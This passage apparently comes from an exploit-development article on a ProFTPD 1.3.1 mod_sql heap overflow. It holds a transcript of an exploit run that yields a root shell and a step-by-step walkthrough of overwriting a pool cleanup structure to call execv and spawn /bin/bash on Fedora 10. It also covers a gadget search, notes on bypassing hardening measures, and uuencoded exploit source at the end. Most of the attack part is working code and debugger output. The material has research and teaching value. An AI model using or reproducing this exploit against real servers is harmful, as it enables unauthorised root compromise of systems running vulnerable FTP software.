+warning: Cannot initialize thread debugging library: generic error
+warning: Cannot initialize thread debugging library: generic error
+(no debugging symbols found)
+[New process 4936]
+(no debugging symbols found)
+---
+# python exploitsc.py 127.0.0.1
+Banner is [220 ProFTPD 1.3.1 Server (ProFTPD Default Installation) 
+[127.0.0.1]]
+331 Password required for %T%m%Z%m%T%l%m%f%l%m%lA%T%m%f%f%l%m%m%T%m%f%m%m%m
+%mA%m%f%f%l%m%TA%m%m%f%l%TA%fA%l%Z%fA%T%T%l%f%l%f%f%Z%l%m%Z%f%l%T%f%Z%fAAA%
+Z%l%m%fA%l%m%TA%ZA%f%lAA%f%m%Z%Z%Z%T%Z%f%m%Z%l%fA%Z
+530 Login incorrect.
+*** With luck, you should have a shell ***
+
+id
+uid=0(root) gid=65534(nogroup) groups=65534(nogroup)
+uname -a
+Linux ubuntu 2.6.27-14-generic #1 SMP Tue Aug 18 16:25:45 UTC 2009 i686 
+GNU/Linux
+---
+
+Well, that demonstrates from source code to shellcode execution..
+exploitation via the demonstrated avenue isn't ideal, but still pretty
+decent.
+
+------[ 4.1 - Cleanup structure crash ]
+
+While experimenting with the auth bypass idea with one of the
+3d10e2a054d8124ab4de5b588c592830 crashes, I hit a pool cleanup structure, 
+and decided to experiment further (with a overwrite of 44 bytes), and 
+exploit it without any shellcode required. 
+
+For this section, we'll target Fedora 10, and the following packages:
+
+fbf3dccc1a396cda2d8725b4503bfc16 proftpd-1.3.1-6.fc10.i386.rpm
+938fd1a965d72ef44cd4106c750a0a2d proftpd-mysql-1.3.1-6.fc10.i386.rpm
+
+Firstly, we'll quickly review some of the protection measures 
+enabled/available in Fedora 10. 
+
+- Exec-shield
+  - Aims to prevent code execution via Code Selector limits, or via PAE.
+  - CS limits are not ideal. 
+
+- FORTIFY_SOURCE
+  - Instruments code during compiling and aims to prevent overflows via
+    common library functions. 
+
+- PIE binaries
+  - Some binaries available in Fedora 10 are compiled as a position 
+    independant executable (PIE). 
+  - Numerous binaries are compiled as ET_EXEC's, however, including
+    ProFTPD.
+
+- SELinux
+  - SELinux is a kernel feature that allows mandatory access control in the
+    kernel. For what we're concerned about, it's aimed at restricting what 
+    can happen post exploitation. A frequent criticism of SELinux is that 
+    it does not protect the kernel against attack.
+
+So, looking at the crash:
+
+Program received signal SIGSEGV, Segmentation fault.
+destroy_pool (p=0x8731eac) at pool.c:415
+415         if (p->parent->sub_pools == p)
+(gdb) p *p
+$1 = {first = 0x61413561, last = 0x37614136, cleanups = 0x41386141,
+sub_pools = 0x62413961, sub_next = 0x31624130, sub_prev = 0x0,
+  parent = 0x62413362, free_first_avail = 0x8002927 <Address 0x8002927
+out of bounds>, tag = 0x0}
+
+Quick glance at the source code (from the proftpd-1.3.2-rc2 release, not
+the fedora release):
+
+---
+410 void destroy_pool(pool *p) {
+411   if (p == NULL)
+412     return;
+413
+414   pr_alarms_block();
+415
+416   if (p->parent) {
+417     if (p->parent->sub_pools == p)
+418       p->parent->sub_pools = p->sub_next;
+419
+420     if (p->sub_prev)
+421       p->sub_prev->sub_next = p->sub_next;
+422
+423     if (p->sub_next)
+424       p->sub_next->sub_prev = p->sub_prev;
+425   }
+426   clear_pool(p);
+427   free_blocks(p->first, p->tag);
+428
+429   pr_alarms_unblock();
+430 }
+---
+
+So, we can see that we overwrote p->parent, and thus entered the 
+conditional on line 416. In order to effectively bypass that section, we
+need:
+
+- p->parent to point to accessible memory (doesn't matter where, it's
+  unlikely to point to p)
+
+- p->sub_prev got nulled out earlier, so it doesn't matter.
+
+- p->sub_next to point to writable memory.
+
+- p->cleanups to point to some memory to be the cleanup structure.
+
+The cleanup structure looks like:
+
+---
+655 typedef struct cleanup {
+656   void *data;
+657   void (*plain_cleanup_cb)(void *);
+658   void (*child_cleanup_cb)(void *);
+659   struct cleanup *next;
+660 } cleanup_t;
+---
+
+---
+693 static void run_cleanups(cleanup_t *c) {
+694   while (c) {
+695     (*c->plain_cleanup_cb)(c->data);
+696     c = c->next;
+697   }
+698 }
+---
+
+The benefits of run_cleanups is that we could call a bunch of different
+pointers as needed.
+
+So, all we need now is to meet our requirements earlier.. For 
+reading/writing memory, the BSS is fine.
+
+For the cleanup structure, we need something that is not randomized, and
+that we know the offset for. Luckily for us, ProFTPD formats its response 
+into the resp_buf buffer, which is on the BSS.
+
+(gdb) p resp_buf
+$5 = "Login incorrect.\000 for
+%m%m%TA%ZA%f%l%fA%mAA%f%TA%f%f%l%l%m%lA%f%Z%m%m%TA%Z%ZA%T%Z%ZAAA%m%m%f%m%T%
+m%f%fA%T%T%Z%l%T%m%l%f%f%f%Z%Z%l%TA%l%l%f%mAA%Z%TAA%f%m%ZAA%l%Z%Z%m%Z%lA%f%
+m"...
+
+And, it doesn't clear memory, leaving old data available for us to use as 
+our structure location. Our first fake auth will have a bunch of 
+AAAA / BBBB / CCCC we can use for replacing.
+
+With those in mind, we can trigger the vulnerability, and see what's 
+available to us:
+
+Program received signal SIGSEGV, Segmentation fault.
+0x0805c82d in run_cleanups (c=0x80ed933) at pool.c:730
+730         (*c->plain_cleanup_cb)(c->data);
+..
+(gdb) x/10i $eip
+0x805c82d <run_cleanups+16>:    call   *0x4(%ebx)
+(gdb) x/4x $ebx
+0x80ed933 <resp_buf+179>:       0x42424242      0x43434343
+0x44444444      0x45454545
+
+Hm, so we need a location in memory to jump to. We control the first
+argument to the function, which is useful. . Looking at the symbol
+table, we see some stuff of interest:
+
+
+080e44f4 R_386_JUMP_SLOT   __printf_chk
+080e4574 R_386_JUMP_SLOT   mempcpy
+080e4578 R_386_JUMP_SLOT   __memcpy_chk
+080e4604 R_386_JUMP_SLOT   dlsym
+080e46a4 R_386_JUMP_SLOT   execv
+080e469c R_386_JUMP_SLOT   memcpy
+080e48d4 R_386_JUMP_SLOT   mmap64
+080e4800 R_386_JUMP_SLOT   strcat
+
+
+dlsym() might be useful if we can get the results and save it somewhere.
+
+memcpy()/strcat()/memcpy()/etc could be useful for constructing a ret to
+libc style attack.
+
+printf() could be used to leak memory contents. Can't use it for writing
+to memory due to FORTIFY_SOURCE.
+
+mmap64() could be useful to map memory readable, writable and executable 
+(assuming SELinux allows it, which is unlikely in recent releases).
+
+execv() could be used to execute an arbitrary process (assuming not
+prevented by SELinux). execv() takes two parameters, program to execute, 
+and argument list. The argument list must consist of valid pointers to 
+readable memory, or the execve() (syscall) will fail.
+
+Since execv() looks like least effort, we'll need to find a way to modify 
+the stack so that the next argument is a pointer to something suitable (a 
+pointer to NULL would be sufficient)
+
+(gdb) x/4x $esp
+0xbf977c60:     0x42424242      0x080ccbe2      0x080e8a40
+0x08730578
+(gdb) x/s 0x080ccbe2
+0x80ccbe2:       "getgroups"
+
+Taking stock of what we have:
+
+eax            0x42424242       1111638594
+ecx            0x8734e10        141774352
+edx            0x80eb040        135180352
+ebx            0x80ed933        135190835
+esp            0xbf977c60       0xbf977c60
+ebp            0xbf977c78       0xbf977c78
+esi            0x8731eac        141762220
+edi            0x80f680c        135227404
+
+We control eax, edx (edx is the fake pointer for sub_prev/sub_next
+stuff), we control ebx to an extent:
+
+(gdb) x/7x $ebx
+0x80ed933 <resp_buf+179>: 0x42424242 0x43434343 0x44444444 0x45454545
+0x80ed943 <resp_buf+195>: 0x46464646 0x47474747 0x48484848
+
+We control esi to an extent:
+(gdb) x/s $esi
+0x8731eac:       "a5Aa6Aa73\331016\ba9Ab@\260\016\b"
+
+So, with that in mind, we are looking for writes to stack at [esp], 
+[esp+4], [esp+8] and [esp+0xc], and hopefully then a jump register. 
+
+We can assemble a bunch of instructions, and use msfelfscan to show 
+potential hits:
+
+ruby msfelfscan -r
+"\x89[\x44\x54]\x24[\x04\x08\x0c][^\xff\xe8]*\xff[\x53\x10\x50\xd0-\xe0]"
+/usr/sbin/proftpd
+[/usr/sbin/proftpd]
+0x0805b10a 8944240c89d02b4308894424088b431089142489442404ff53
+0x0805b81d 894424048b450c890424ffd2
+0x0805cd62 8944240c8b4310894424088b4208894424048b4204890424ffd7
+0x0805e158 8944240889742404c70424df7b0d08ffd7
+0x08063ed8 8944240c8b431c894424088b4318894424048b4314890424ff53
+0x080706cc 895424048b5508891424ff50
+0x08070720 89442404a13cd80e088b5508891424ff50
+0x08070754 89442404a144d80e088b5508891424ff50
+0x08070787 89442404a140d80e088b5508891424ff50
+0x08070a84 89542404ff50
+0x08070acb 89442404a13cd80e08ff50
+0x08070af3 89442404a144d80e08ff50
+0x08070b5a 89442404a140d80e08ff50
+0x08070cc2 89542404ff50
+0x08070ce3 89442404a13cd80e08ff50
+0x08070d0b 89442404a144d80e08ff50
+0x08070d4a 89442404a140d80e08ff50
+0x08072081 8944240ca184ec0e08890424ffd2
+0x08072127 8944240c8b4604c744240462c20c0889442408a184ec0e08890424ffd2
+0x080721da 8944240ca184ec0e08890424ffd2
+0x0807222b 8944240c8b4604c74424046ac20c0889442408a184ec0e08890424ffd2
+0x080722ac 89442408a184ec0e08890424ffd2
+0x0807824b 894424088954240c8b460489342489442404ff53
+0x080782f2 8954240c894424088b460489342489442404ff53
+0x08078388 8944240c8b450c894424088b460489342489442404ff53
+0x08078468 8944240c8b450c894424088b460489342489442404ff53
+0x08078798 894424088b460489342489442404ff53
+0x08078a4b 89442404ff53
+0x08079b08 8944240889742404891c24ffd2
+0x08079bf2 8944240c8b450c89442408ff53
+0x08079c93 89442404ff53
+0x08079d1c 89442404ff53
+0x0807a16c 8944240c8b450c89442408ff53
+0x0807a264 89442408ff53
+0x0807a7e7 89442408ffd6
+0x0807c7d3 89442404ff53
+0x0807c85c 89442404ff53
+0x0807cc9c 8944240c8b450c89442408ff53
+0x0807e412 89542408894c2404893424ffd3
+0x0807f209 89442404ffd7
+0x0807f222 89442404ffd7
+0x0807f262 89442404ffd7
+
+After spending some time looking at the output, we find one that fits the 
+bill, and is absolutely perfect.
+
+(gdb) x/10i 0x08063ed8
+0x8063ed8 <run_schedule+56>:    mov    %eax,0xc(%esp)
+0x8063edc <run_schedule+60>:    mov    0x1c(%ebx),%eax
+0x8063edf <run_schedule+63>:    mov    %eax,0x8(%esp)
+0x8063ee3 <run_schedule+67>:    mov    0x18(%ebx),%eax
+0x8063ee6 <run_schedule+70>:    mov    %eax,0x4(%esp)
+0x8063eea <run_schedule+74>:    mov    0x14(%ebx),%eax
+0x8063eed <run_schedule+77>:    mov    %eax,(%esp)
+0x8063ef0 <run_schedule+80>:    call   *0xc(%ebx)
+
+If we execute from 0x8063ee3, it does the job perfectly. It will load 
+pointers from $ebx (which we can populate however we want), and stick them 
+on the stack, then jump to an address we want. We will need a program to 
+execute, and a pointer to NULL. We can craft the fakeauth attempt as:
+
+...memory stuff...AAAABBBBCCCC.../bin/sh or /usr/bin/python (as it's
+important to have NULL termination, which will be provided).
+
+Hardware assisted breakpoint 1 at 0x8063ee3: file support.c, line 132.
+
+Breakpoint 1, 0x08063ee3 in run_schedule () at support.c:132
+132           s->f(s->a1,s->a2,s->a3,s->a4);
+Missing separate debuginfos, use: debuginfo-install
+audit-libs-1.7.13-1.fc10.i386 e2fsprogs-libs-1.41.4-6.fc10.i386
+keyutils-libs-1.2-3.fc9.i386 krb5-libs-1.6.3-18.fc10.i386
+libattr-2.4.43-2.fc10.i386 libselinux-2.0.78-1.fc10.i386
+mysql-libs-5.0.84-1.fc10.i386 zlib-1.2.3-18.fc9.i386
+(gdb) x/8i $eip
+0x8063ee3 <run_schedule+67>:    mov    0x18(%ebx),%eax
+0x8063ee6 <run_schedule+70>:    mov    %eax,0x4(%esp)
+0x8063eea <run_schedule+74>:    mov    0x14(%ebx),%eax
+0x8063eed <run_schedule+77>:    mov    %eax,(%esp)
+0x8063ef0 <run_schedule+80>:    call   *0xc(%ebx)
+(gdb) x/x $ebx+0x18
+0x80ed94b <resp_buf+203>:       0x48484848
+(gdb) x/x $ebx+0x14
+0x80ed947 <resp_buf+199>:       0x47474747
+(gdb) x/x $ebx+0xc
+0x80ed93f <resp_buf+191>:       0x45454545
+
+We can replace HHHH with resp_buf + 400 to point to NULL, we can put in our
+offset for the program to execute in GGGG, and our execv code at EEEE, 
+which will be:
+
+080526b8 <execv@plt>:
+ 80526b8:       ff 25 a4 46 0e 08       jmp    *0x80e46a4
+ 80526be:       68 00 05 00 00          push   $0x500
+ 80526c3:       e9 e0 f5 ff ff          jmp    8051ca8 <_init+0x30>
+
+Putting those together, we then see:
+
+Breakpoint 1, 0x08063ee3 in run_schedule () at support.c:132
+132           s->f(s->a1,s->a2,s->a3,s->a4);
+(gdb) c
+Continuing.
+[New process 22952]
+Executing new program: /bin/bash
+warning: Cannot initialize thread debugging library: generic error
+
+Due to alarm() being called in ProFTPD, you'll have to reset it / catch it 
+/ block it (the "trap" command in bash should be able to do this for you), 
+otherwise the connection will drop out some time later on.
+
+If PIE was enabled, and the binary ended up past 0x01000000, we could brute
+force it and still gain code execution. The only problem now to deal with 
+is with SELinux restrictions. Any decent kernel exploit will disable that 
+for you ;)
+
+------[ 4.2 - Potential enhancements ]
+
+There are a variety of enhancements that could be done to make the exploit 
+better in a variety of ways, such as a known target lists, bruteforce 
+ability (both offset and tags, if necessary. Timing attacks may be useful),
+porting it to metasploit so you have the advantage of changing shellcodes,
+etc.
+
+Also, more work would be required against distributions, because if ProFTPD
+is compiled with shared library support, using time() as an offset may 
+change ;) Additionally, it may be possible that some distributions require 
+different ways due to charcter restrictions.
+
+Further research would be needed in common ProFTPD w/ mod_sql.c 
+configuration guides in order to see what table names / fields are used.
+
+Further experimentation with the pool implementation in ProFTPD might be in
+order, as perhaps it would be possible to work out a generic fake/trigger
+string that would work in all cases. 
+
+Since the SQL injection fix, the bug is no longer remote root pre auth via 
+USER handling it has lost a lot of it's sexiness <;-P~ Don't know if the 
+bug is reachable through authentication.. if it is, there's a lot more work
+involved due to dropped privileges, potential chroot()ing, and so on. At 
+least RootRevoke isn't enabled by default according to some random 
+documentation I was reading :p
+
+------[ 4.3 - Last thoughts ]
+
+Initial experimentation of the vulnerability with constraint solvers was
+interesting, however, in hindsight, just replicating the constraint checks
+and random generation would of been a better idea. Same goes for using GA
+to mutate input strings, though the GA use was worse because the metrics
+used was pretty bad. In hindsight, I had a solution looking for a problem.
+
+Additionally, [11] has some more information regarding this vulnerability
+when you consider the timing aspect of heap massages.
+
+--[ 5 - Discussion of hardening techniques against exploitation ]
+
+It's always fun to consider the effects of various hardening techniques
+against exploitation, and if it helps mitigate the issue. Here's some 
+thoughts on the matter.
+
+------[ 5.1 - Address Space Layout Randomisation ]
+
+If the binary is not compiled as a position independent executable (PIE)
+binary, ASLR is not much of a problem as we target the GOT for storing the
+shellcode. We require only one offset, and on non-PIE binaries, we should 
+be in luck.
+
+------[ 5.2 - Non-executable Memory ] 
+
+With kernels using PAE and hardware supported NX-bit will break our 
+shellcode approach, however, it will not affect our approach used in 
+"Cleanup structure crash".
+
+With kernels that use CS limit to approximate non executable memory, it may
+be possible that a higher region of memory is marked executable, and thus 
+our shellcode region is executable. The metasploit stager shellcode reads
+onto the stack and jumps to it, so cs limit approximation would block that
+attempt. A suitable mprotect() call could fix it though.
+
+It may be possible use the overflow to make ProFTPD think we have been 
+authenticated, without requiring any shellcode. Assuming the pool memory 
+layout is not irreparably harmed, we may be able to do some interesting 
+things.
+
+------[ 5.3 - Position Independent Executable Binaries ]
+
+In case of PIE, it would be feasible to brute force the randomisation as
+ProFTPD fork()s for each client connection. In order to make the most of
+ASLR, ProFTPD would have to fork+execve() itself, or be configured to use
+xinetd/inetd (which would probably be a significant performance problem on 
+busy sites). Using fork+execve() would be the best approach as it would 
+require least changes by the user except an update to ProFTPD.
+
+The avenue we are using for exploitation does not lend itself to off-by-X 
+overwrites, as our contents is appended by ')\x00, which restricts the 
+characters we can use dramatically. 
+
+As for information leaks, I have seen heap address info leaks when the 
+server replies with "Password needed for <OUR CONTENT><MANGLED HEAP 
+ADDRESS>". This may be useful at some stage if a different avenue is needed
+for exploitation.
+
+Unfortunately, ProFTPD frequently uses pcalloc() which reduces the 
+potential for info leaks in some other cases.
+
+------[ 5.4 - Stack Protector ] 
+
+SSP does not play much of a part as we are not overwriting the stack, and 
+nor are we abusing a libc function to overwrite contents (due to recent 
+instrumentation added to gcc/glibc/so on). So far, targeting the stack 
+seems irrelevant, and due to ASLR being in modern kernels, not that useful.
+
+------[ 5.5 - RelRO ]
+
+If readonly relocations is enabled on the target binary, (and being 
+enforced/enabled properly) it will break our current avenue of overwriting
+the GOT table to gain control of execution. 
+
+However, it may be possible to target .bss heap pointers in ProFTPD that 
+get called. (objdump -tr /usr/local/sbin/proftpd | grep bss | grep 0004 or 
+so should find potential function pointers :p)
+
+Assuming non-executable memory is not in use, the BSS provides a suitable
+location to store our shellcode, due to the proctitle.c code.
+
+--[ 6 - References
+
+[1]  http://www.proftpd.org
+[2]  http://labix.org/python-constraint
+[3]  http://bitbucket.org/haypo/python-ptrace/
+[4]  http://pyevolve.sourceforge.net/
+[5]  http://www.castaglia.org/proftpd/doc/devel-guide/introduction.html
+[6]  http://www.phreedom.org/solar/exploits/proftpd-ascii/
+[7]  ga_exp_find.py in the attached code.. my bash history says I used
+     it with python ga_exp_find.py -o 32 -i 127.0.0.1 -U -s f .. for 
+     what it's worth :p
+[8]  http://dev.mysql.com/doc/refman/5.0/en/string-syntax.html
+[9]  code/final_exploit/exploit.py
+[10] code/final_exploit/exploitsc.py
+[11] http://felinemenace.org/~andrewg/Timing_attacks_and_heap_exploitation/
+
+
+begin 644 proftpd.py
+M"FEM<&]R="!O<PII;7!O<G0@<WES"FEM<&]R="!R90II;7!O<G0@<VEG;F%L
+M"FEM<&]R="!S=')U8W0*:6UP;W)T('-O8VME=`II;7!O<G0@=&EM90IF<F]M
+M(&]P='!A<G-E(&EM<&]R="!/<'1I;VY087)S97(L($]P=&EO;D=R;W5P"FEM
+M<&]R="!H87-H;&EB"FEM<&]R="!R86YD;VT*:6UP;W)T('1E;&YE=&QI8@II
+M;7!O<G0@<F4@"@II;7!O<G0@<&EC:VQE"FEM<&]R="!S96QE8W0*"FEM<&]R
+M="!C;W!Y"@IS<VQ?879A:6QA8FQE(#T@1F%L<V4*"G1R>3H*"6EM<&]R="!S
+M<VP*"7-S;%]A=F%I;&%B;&4@/2!4<G5E"F5X8V5P="!);7!O<G1%<G)O<BP@
+M93H*"7!A<W,*"@IC;&%S<R!5<V5R4W1R:6YG.@H))R<G"@E5<V5R4W1R:6YG
+M(&ES(&%N(&%B<W1R86-T:6]N('5S960@=&\@<F5F;&5C="!T:&4@9V5N97)A
+M=&5D('-T<FEN9R!F;W(@=&AE(%5315(*"6-O;6UA;F0N"@H))R<G"@H)<F5P
+M971I=&EO;G,@/2`P"0D)"2,@2&]W(&UA;GD@)6TG<S\*"6-H87)S(#T@,"`)
+M"0D)(R!(;W<@;6%N>2!!)W,_"@EP97)C96YT7U1S(#T@,`D)"0DC($AO=R!M
+M86YY("54)W,_"@EP97)C96YT7V9S(#T@,`D)"0DC($AO=R!M86YY("5F)W,_
+M"@EP97)C96YT7VQS(#T@,`D)"0DC($AO=R!M86YY("5L)W,_"@EO=F5R9FQO
+M=U]S:7IE(#T@,`D)"2,@2&]W(&UU8V@@87)E('=E('1R>6EN9R!T;R!O=F5R
+M9FQO=R!B>3\*"6-O;'5M;E]L96X@/2`P"0D)"2,@5VAA="!I<R!T:&4@;&5N
+M9W1H(&]F('1H92!C;VQU;6Y?;F%M93\*"B`@("`@("`@=6YK;F]W;E]T86=?
+M;&5N9W1H(#T@;&5N*"=[54Y+3D]73B!404=])RD*("`@("`@("!I9&5N=%]T
+M86=?;&5N9W1H(#T@;&5N*"=53DM.3U=.)RD*"@H)9&5F(%]?:6YI=%]?*'-E
+M;&8L(&-H<F]M;W-O;64L(&]V97)F;&]W7W-I>F4L(&-O;'5M;E]L96XI.@H)
+M"7-E;&8N8VAR;VUO<V]M92`](&-H<F]M;W-O;64*"@D)<V5L9BYO=F5R9FQO
+M=U]S:7IE(#T@;W9E<F9L;W=?<VEZ90H)"7-E;&8N8V]L=6UN7VQE;B`](&-O
+M;'5M;E]L96X*"@D)<V5L9BYR97!E=&ET:6]N<R`](&-H<F]M;W-O;64N8V]U
+M;G0H(B5M(BD*"0ES96QF+F-H87)S(#T@8VAR;VUO<V]M92YC;W5N="@B02(I
+M"@D)<V5L9BYP97)C96YT7U1S(#T@8VAR;VUO<V]M92YC;W5N="@B)50B*0H)
+M"7-E;&8N<&5R8V5N=%]F<R`](&-H<F]M;W-O;64N8V]U;G0H(B5F(BD*"0ES
+M96QF+G!E<F-E;G1?;',@/2!C:')O;6]S;VUE+F-O=6YT*"(E;"(I"@D)<V5L
+M9BYP97)C96YT7UIS(#T@8VAR;VUO<V]M92YC;W5N="@B)5HB*0H*"0ES96QF
+M+FQE;F=T:"`]('-E;&8N;&5N*"D*"0ES96QF+F-H<F]M;W-O;64N<&]P*"D*
+M"@ED968@;&5N*'-E;&8I.@H)"2<G)PH)"6QE;B@I(&-A;&-U;&%T97,@:&]W
+M(&UU8V@@<W!A8V4@=&AE(&=I=F5N('-T<FEN9R!W:6QL(&5X<&%N9"!T;R!D
+M=64@=&\@=&%G('!A<W-I;F<N"@D))R<G"@H)"2-A<W-E<G0H<V5L9BYC;VQU
+M;6Y?;&5N("$](#`I"@H)"6QI;F5?;&5N9W1H(#T@;&5N*"(B+FIO:6XH<V5L
+M9BYC:')O;6]S;VUE*2D*"0D*"0DC("@@*R!C;VQU;6Y?;&5N("L@/2<*"0ER
+M970@/2`Q("L@<V5L9BYC;VQU;6Y?;&5N("L@,@H)"7)E="`K/2`H<V5L9BYR
+M97!E=&ET:6]N<R`J(&QI;F5?;&5N9W1H*0H)"7)E="`K/2!S96QF+F-H87)S
+M"@D)<F5T("L]('-E;&8N;W9E<F9L;W=?<VEZ90H)"7)E="`K/2`H<V5L9BYU
+M;FMN;W=N7W1A9U]L96YG=&@@*B!S96QF+G!E<F-E;G1?6G,I"2,@>U5.2TY/
+M5TX@5$%'?0H)"7)E="`K/2!S96QF+G!E<F-E;G1?9G,)"0D)"2,@+0H)"7)E
+M="`K/2`H<V5L9BYP97)C96YT7U1S("H@,RD)"0D)(R`P+C`*"0ER970@*ST@
+M*'-E;&8N:61E;G1?=&%G7VQE;F=T:"`J('-E;&8N<&5R8V5N=%]L<RD)"2,@
+M54Y+3D]73@H)"7)E="`K/2`R("`C("<I(`H)"@D)<F5T=7)N(')E=`H*"61E
+M9B!?7W-T<E]?*'-E;&8I.@H)"7)E='5R;B`B(BYJ;VEN*'-E;&8N8VAR;VUO
+M<V]M92D*"F-L87-S(%-I;&QY4W1R=6-T.@H)<&%R86US(#T@6UT*"@ED968@
+M7U]I;FET7U\H<V5L9BP@*F%R9W,I.@H)"6%S<V5R="AL96XH<V5L9BYP87)A
+M;7,I("$](#`I"@H)"6EF*&QE;BAA<F=S*2DZ"@D)"6%S<V5R="AL96XH87)G
+M<RD@/3T@;&5N*'-E;&8N<&%R86US*2D*"@D)"7!A<F%M<R`](&-O<'DN8V]P
+M>2AS96QF+G!A<F%M<RD*"@D)"69O<B!A<F<@:6X@87)G<SH*"0D)"7-E=&%T
+M='(H<V5L9BP@<&%R86US+G!O<"@P*2P@87)G*0H*"61E9B!?7W-T<E]?*'-E
+M;&8I.@H)"7)E="`](%M="@H)"2,@8V%N('!R;V)A8FQY("),(B`J(&%M="P@
+M*G-E;&8N<&%R86US(&ET+@H*"0EF;W(@<&%R86T@:6X@<V5L9BYP87)A;7,Z
+M"@D)"2-P<FEN="!P87)A;0H)"0DC<')I;G0@9V5T871T<BAS96QF+"!P87)A
+M;2D*"0D)<F5T+F%P<&5N9"AS=')U8W0N<&%C:R@B/$PB+"!G971A='1R*'-E
+M;&8L('!A<F%M*2DI"@H)"7)E='5R;B`B(BYJ;VEN*')E="D*"@ED968@7U]L
+M96Y?7RAS96QF*3H*"0ER971U<FX@;&5N*'-E;&8N<&%R86US*2`J(#0*"F-L
+M87-S(%!O;VQ";&]K*%-I;&QY4W1R=6-T*3H*"2,@("`O*B!!8W1U86P@:&5A
+M9&5R("HO"@DC("!S=')U8W0@>PH)(R`@("!C:&%R("IE;F1P.PH)(R`@("!U
+M;FEO;B!B;&]C:U]H9'(@*FYE>'0["@DC("`@(&-H87(@*F9I<G-T7V%V86EL
+M.PH)(R`@?2!H.PH)(R`K('!A9&1I;F<@8W)A<"`Z?`H)(R!T;W1A;"!O9B`R
+M-"!B>71E<RX*"@EE;F1P(`D)/2`P>#0Q-#$T,30Q"@EN97AT(`D)/2`P>#0R
+M-#(T,C0R"@EF:7)S=%]A=F%I;`D](#!X-#,T,S0S-#,*"7!A9%\Q"0D](#!X
+M-#`T,#0P-#`*"@EP87)A;7,@/2!;(")E;F1P(BP@(FYE>'0B+"`B9FER<W1?
+M879A:6PB+"`B<&%D7S$B(%T*"F-L87-S(%!O;VQ(96%D97(H4VEL;'E3=')U
+M8W0I.@H)(R!S=')U8W0@<&]O;"!["@DC("!U;FEO;B!B;&]C:U]H9'(@*F9I
+M<G-T.PH)(R`@=6YI;VX@8FQO8VM?:&1R("IL87-T.PH)(R`@<W1R=6-T(&-L
+M96%N=7`@*F-L96%N=7!S.PH)(R`@<W1R=6-T('!O;VP@*G-U8E]P;V]L<SL*
+M"2,@('-T<G5C="!P;V]L("IS=6)?;F5X=#L*"2,@('-T<G5C="!P;V]L("IS
+M=6)?<')E=CL*"2,@('-T<G5C="!P;V]L("IP87)E;G0["@DC("!C:&%R("IF
+M<F5E7V9I<G-T7V%V86EL.PH)(R`@8V]N<W0@8VAA<B`J=&%G.PH)(R!].PH*
+M"69I<G-T(`D)"3T@,'@S,#,P,S`S,`H);&%S="`)"0D](#!X,S$S,3,Q,S$*
+M"6-L96%N=7!S(`D)/2`P>#,R,S(S,C,R"@ES=6)?<&]O;',)(`D](#!X,S,S
+M,S,S,S,*"7-U8E]N97AT(`D)/2`P>#,T,S0S-#,T"@ES=6)?<')E=@D)/2`P
+M>#,U,S4S-3,U"@EP87)E;G0)"0D](#!X,S8S-C,V,S8*"69R965?9FER<W1?
+M879A:6P)/2`P>#,W,S<S-S,W"@ET86<)"0D](#!X,S@S.#,X,S@*"@DC("<I
+M7'@P,"!F;W(@=&%G(`H)<&%R86US(#T@6R`B9FER<W0B+"`B;&%S="(L(")C
+M;&5A;G5P<R(L(")S=6)?<&]O;',B+"`B<W5B7VYE>'0B+"`B<W5B7W!R978B
+M+"`B<&%R96YT(BP@(F9R965?9FER<W1?879A:6PB("!="@IC;&%S<R!0;V]L
+M0VQE86YU<"A3:6QL>5-T<G5C="DZ"@DC='EP961E9B!S=')U8W0@8VQE86YU
+M<"!["@DC("!V;VED("ID871A.PH)(R`@=F]I9"`H*G!L86EN7V-L96%N=7!?
+M8V(I*'9O:60@*BD["@DC("!V;VED("@J8VAI;&1?8VQE86YU<%]C8BDH=F]I
+M9"`J*3L*"2,@('-T<G5C="!C;&5A;G5P("IN97AT.PH)(WT@8VQE86YU<%]T
+M.PH*"61A=&$@/2`P>#4Q-3$U,34Q"@EP;&%I;E]C;&5A;G5P7V-B(#T@,'@U
+M,C4R-3(U,@H)8VAI;&1?8VQE86YU<%]C8B`](#!X-3,U,S4S-3,)"@EN97AT
+M(#T@,'@U-#4T-30U-`H*"7!A<F%M<R`](%L@(F1A=&$B+"`B<&QA:6Y?8VQE
+M86YU<%]C8B(L(")C:&EL9%]C;&5A;G5P7V-B(BP@(FYE>'0B(%T*"@IC;&%S
+M<R!0<F]&5%!$7T)A<VEC<SH*"2<G)R`*"4)A<V4@8VQA<W,@9F]R(&]F9G-E
+M="!E>'!L;VET871I;VXL(&%N9"!B<G5T969O<F-E(&5X<&QO:71A=&EO;BX*
+M"2<G)PH*"75S97)?8V]L=6UN7VQE;F=T:"`](#`*"@DC(%-E;&8M9&]C=6UE
+M;G1I;F<@8V]D92`Z*0H)=7-E<E]C;VQU;6Y?;&5N9W1H<R`](%L@;&5N*")U
+M<V5R:60B*2P@;&5N*")U<V5R;F%M92(I(%T@"@H);7-F7W!A='1E<FX@/2`H
+M"@D))T%A,$%A,4%A,D%A,T%A-$%A-4%A-D%A-T%A.$%A.4%B,$%B,4%B,D%B
+M,T%B-$%B-2<*"0DG06(V06(W06(X06(Y06,P06,Q06,R06,S06,T06,U06,V
+M06,W06,X06,Y060P060Q)PH)"2=!9#)!9#-!9#1!9#5!9#9!9#=!9#A!9#E!
+M93!!93%!93)!93-!931!935!939!93<G"@D))T%E.$%E.4%F,$%F,4%F,D%F
+M,T%F-$%F-4%F-D%F-T%F.$%F.4%G,$%G,4%G,D%G,R<*"0DG06<T06<U06<V
+M06<W06<X06<Y06@P06@Q06@R06@S06@T06@U06@V06@W06@X06@Y)PH)"2=!
+M:3!!:3%!:3)!:3-!:31!)PH)*0H*"6)A9&-H87)S(#T@<V5T*")<>#`P7'@P
+M85QX,&1<>#%A7'@R,EQX,C5<>#(W7'@U8UQX-69<>&9F(BD*"7-K="`]($YO
+M;F4*"@EC86-H92`]($YO;F4*"@ED968@7U]I;FET7U\H<V5L9BP@:&]S="P@
+M;W!T:6]N<RDZ"@D)<V5L9BYH;W-T(#T@:&]S=`H)"7-E;&8N;W!T:6]N<R`]
+M(&]P=&EO;G,*"@D)(W!R:6YT(&]P=&EO;G,*"@D):68H;W!T:6]N<RYU<V5R
+M7V-O;'5M;E]L96YG=&@I.@H)"0ES96QF+G5S97)?8V]L=6UN7VQE;F=T:',@
+M/2!;(&]P=&EO;G,N=7-E<E]C;VQU;6Y?;&5N9W1H(%T*"0D*"@ED968@<V5T
+M7W5S97)?8V]L=6UN*'-E;&8L(&YA;64I.@H)"7-E;&8N=7-E<E]C;VQU;6Y?
